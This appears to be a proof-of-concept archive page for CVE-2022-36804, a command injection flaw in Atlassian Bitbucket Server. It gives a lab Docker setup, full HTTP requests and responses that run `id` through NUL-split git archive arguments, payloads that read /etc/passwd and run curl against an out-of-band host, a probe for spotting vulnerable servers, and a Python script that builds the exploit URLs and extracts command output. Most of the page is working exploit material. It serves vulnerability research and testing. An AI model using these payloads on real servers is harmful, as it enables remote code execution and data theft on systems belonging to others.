POC details: 569c7be631ba446b6c437e81cd75a8ba33075e7c

Source
Related vulnerability
Title: Atlassian Bitbucket Server security vulnerability (CVE-2022-36804)
Description: Atlassian Bitbucket Server is a Git code hosting solution from the Australian company Atlassian. It manages and reviews code and offers features such as diff views, JIRA integration and build integration. Atlassian Bitbucket Server and Data Center contain a security vulnerability: a remote attacker with read permission on a public or private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request. The following products and versions are affected: 7.0.0 up to but not including 7.6.17, 7.7.0 up to but not including 7.17.10, 7.18.0
Description
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)
Introduction
# CVE-2022-36804
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

> In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

### Vulnerable Target Setup

```shell
docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11

docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
```
- Create a new project with key `CFX` and a repository named `lord`, and make the repository public. Any project and repository names will do, but the REST paths used below (`/projects/cfx/repos/lord/`) must be changed to match.
- To list the public repositories: `curl http://127.0.0.1:7990/rest/api/latest/repos`

### POC

#### REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```
#### RESPONSE
```
HTTP/1.1 500 
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380

{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}
```

### Additional Payloads

- Reading `/etc/passwd` 
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
```
- OOB test; replace `http://example.com` with a Burp Collaborator URL or an `nc` listener
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/
```

#### Basic check to find a vulnerable server

REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```

RESPONSE
```
HTTP/1.1 200 
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT

usage: git archive [<options>] <tree-ish> [<path>...]
   or: git archive --list
   or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
   or: git archive --remote <repo> [--exec <cmd>] --list

    --format <fmt>        archive format
    --prefix <prefix>     prepend prefix to each pathname in the archive
    -o, --output <file>   write the archive to this file
    --worktree-attributes
                          read .gitattributes in working directory
    -v, --verbose         report archived files on stderr
    -0                    store only
    -1                    compress faster
    -9                    compress better

    -l, --list            list supported archive formats

    --remote <repo>       retrieve the archive from remote repository <repo>
    --exec <command>      path to the remote git-upload-archive command

```
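The `id` request in the POC section and the `--help` probe above rely on the same flaw: the `prefix` query parameter is dropped straight into `git archive --prefix=<value>`, and the `%00` bytes split that single argument into several, so `--remote=/` and `--exec=...` reach git as options of their own (the 500 message above shows exactly that command line). With `--remote` set, git hands the `--exec` value to a shell, which is why the backtick expansion runs `id` and why its output comes back inside the `CommandFailedException` message (the shell then fails trying to execute `uid=2003(bitbucket)` as a command). The following Python script is an added example, not code from the POC repository: it models that argv split, builds the probe and `id` URLs used on this page, classifies the `--help` probe response, and pulls the command output out of the 500 error body. The project/repository names follow the lab setup above; the `User-Agent` string and the `fetch` helper are assumptions.

```python
# Added example (not from the original POC repository): model the NUL-byte
# argument splitting behind CVE-2022-36804, build the probe/exploit URLs
# used on this page, and extract command output from the error response.
# Assumptions: project "cfx" / repo "lord" as in the lab setup; the response
# parsing is keyed on the JSON error format shown on the page.
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import quote, urlencode

# Harmless probe: makes `git archive` print its usage text into the download.
PROBE_PREFIX = "/\x00--help\x00--\x00"
# Page's id() payload: `--remote=/` makes git run the `--exec` value via a shell.
EXEC_PREFIX = "fusion/\x00--remote=/\x00--exec=`id`\x00--prefix=/"


def injected_argv(prefix: str) -> list:
    """argv entries git ends up receiving for the single `--prefix=<prefix>`
    argument once the embedded NUL bytes split it (what the 500 message shows).
    This only models the split; it does not run git."""
    return ("--prefix=" + prefix).split("\x00")


def build_archive_url(base: str, project: str, repo: str, prefix: str,
                      path: str = None, fmt: str = "zip") -> str:
    """URL for the archive endpoint; NUL bytes are percent-encoded as %00,
    '/' and '=' are left literal so the URL matches the page's requests."""
    params = {"format": fmt}
    if path:
        params["path"] = path
    params["prefix"] = prefix
    query = urlencode(params, safe="/=", quote_via=quote)
    return f"{base}/rest/api/latest/projects/{project}/repos/{repo}/archive?{query}"


def classify_probe_response(status: int, body: str) -> str:
    """'vulnerable' when the --help probe leaked git's usage text into the
    archive download; otherwise 'not observed' (patched, or wrong names)."""
    if status == 200 and "usage: git archive" in body:
        return "vulnerable"
    return "not observed"


def extract_command_output(body: str) -> str:
    """Return whatever the injected command produced, taken from the
    CommandFailedException JSON the archive endpoint returns: git's stderr,
    including the shell's complaint that carries the `id` output, follows
    the 'saying:' marker in errors[].message."""
    for err in json.loads(body).get("errors", []):
        msg = err.get("message", "")
        if "saying:" in msg:
            return msg.split("saying:", 1)[1].strip()
    return ""


def fetch(url: str):
    """GET the URL and return (status, body) without raising on 4xx/5xx,
    since the exploit path answers with a 500 that still carries the output."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2022-36804-check"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Only the harmless --help probe is sent by default.
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:7990"
    probe_url = build_archive_url(base, "cfx", "lord", PROBE_PREFIX)
    status, body = fetch(probe_url)
    print(probe_url, status, classify_probe_response(status, body))
```

Run it as `python3 check.py http://127.0.0.1:7990` against the lab container; `build_archive_url(..., EXEC_PREFIX, path="bighax")` reproduces the POC request byte for byte, and `extract_command_output` applied to that request's 500 body returns the line starting with the `id` output.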
File snapshot

```
[4.0K] /data/pocs/569c7be631ba446b6c437e81cd75a8ba33075e7c
├── [1.0K] LICENSE
└── [4.4K] README.md

0 directories, 2 files
```